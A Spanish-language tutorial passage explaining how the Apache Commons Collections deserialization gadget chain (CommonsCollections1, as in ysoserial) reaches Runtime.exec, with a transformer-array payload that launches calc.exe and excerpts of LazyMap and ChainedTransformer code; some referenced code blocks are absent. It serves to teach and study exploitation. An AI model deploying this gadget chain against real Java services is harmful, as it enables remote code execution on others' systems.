En varios lugares puedes encontrar una carga útil de deserialización de java que utiliza transformadores de Apache common collections como el siguiente:
Si no sabes nada sobre los payloads de deserialización de Java, podría ser difícil entender por qué este código ejecutará un calc.
Primero que nada, necesitas saber que un Transformer en Java es algo que recibe una clase y la transforma en una diferente.
También es interesante saber que el payload que está siendo ejecutado aquí es equivalente a:
Entonces, ¿cómo se presenta la primera carga útil equivalente a esas "simples" líneas de código?
Primero que nada, puedes notar en la carga útil que se crea una cadena (array) de transformaciones:
String[] command = {"calc.exe"};finalTransformer[] transformers =newTransformer[]{//(1) - Get gadget Class (from Runtime class)newConstantTransformer(Runtime.class),//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"newInvokerTransformer("getMethod",newClass[]{ String.class,Class[].class},newObject[]{"getRuntime",newClass[0]}),//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime ojectnewInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,newObject[0]}),//(4) - Use the Runtime object to call exec with arbitrary commandsnewInvokerTransformer("exec",newClass[]{String.class},command)};ChainedTransformer chainedTransformer =newChainedTransformer(transformers);
Si lees el código, notarás que si de alguna manera encadenas la transformación del array, podrías ejecutar comandos arbitrarios.
Entonces, ¿cómo se encadenan esas transformaciones?
En la última sección de la carga útil, puedes ver que se crea un objeto Map. Luego, se ejecuta la función decorate de LazyMap con el objeto map y los transformadores encadenados. En el siguiente código puedes ver que esto hará que los transformadores encadenados se copien dentro del atributo lazyMap.factory:
protectedLazyMap(Map map,Transformer factory) {super(map);if (factory ==null) {thrownewIllegalArgumentException("Factory must not be null");}this.factory= factory;}
Y luego se ejecuta el gran final: lazyMap.get("anything");
Este es el código de la función get:
publicObjectget(Object key) {if (map.containsKey(key) ==false) {Object value =factory.transform(key);map.put(key, value);return value;}returnmap.get(key);}
Y este es el código de la función transform
publicObjecttransform(Object object) {for (int i =0; i <iTransformers.length; i++) {object = iTransformers[i].transform(object);}return object;}
Así que, recuerda que dentro de factory habíamos guardado chainedTransformer y dentro de la función transform estamos recorriendo todos esos transformers encadenados y ejecutando uno tras otro. Lo curioso es que cada transformer está usando objectcomo entrada y object es la salida del último transformer ejecutado. Por lo tanto, todas las transformaciones están encadenadas ejecutando la carga útil maliciosa.
Resumen
Al final, debido a cómo lazyMap está gestionando los transformers encadenados dentro del método get, es como si estuviéramos ejecutando el siguiente código:
Note que aquí se explicaron los gadgets utilizados para el payload de ComonsCollections1. Pero queda cómo todo esto comienza a ejecutarse. Puedes ver aquí que ysoserial, para ejecutar este payload, utiliza un objeto AnnotationInvocationHandler porque cuando este objeto se deserializa, invocará la función payload.get() que ejecutará todo el payload.
Java Thread Sleep
Este payload podría ser útil para identificar si la web es vulnerable ya que ejecutará un sleep si lo es.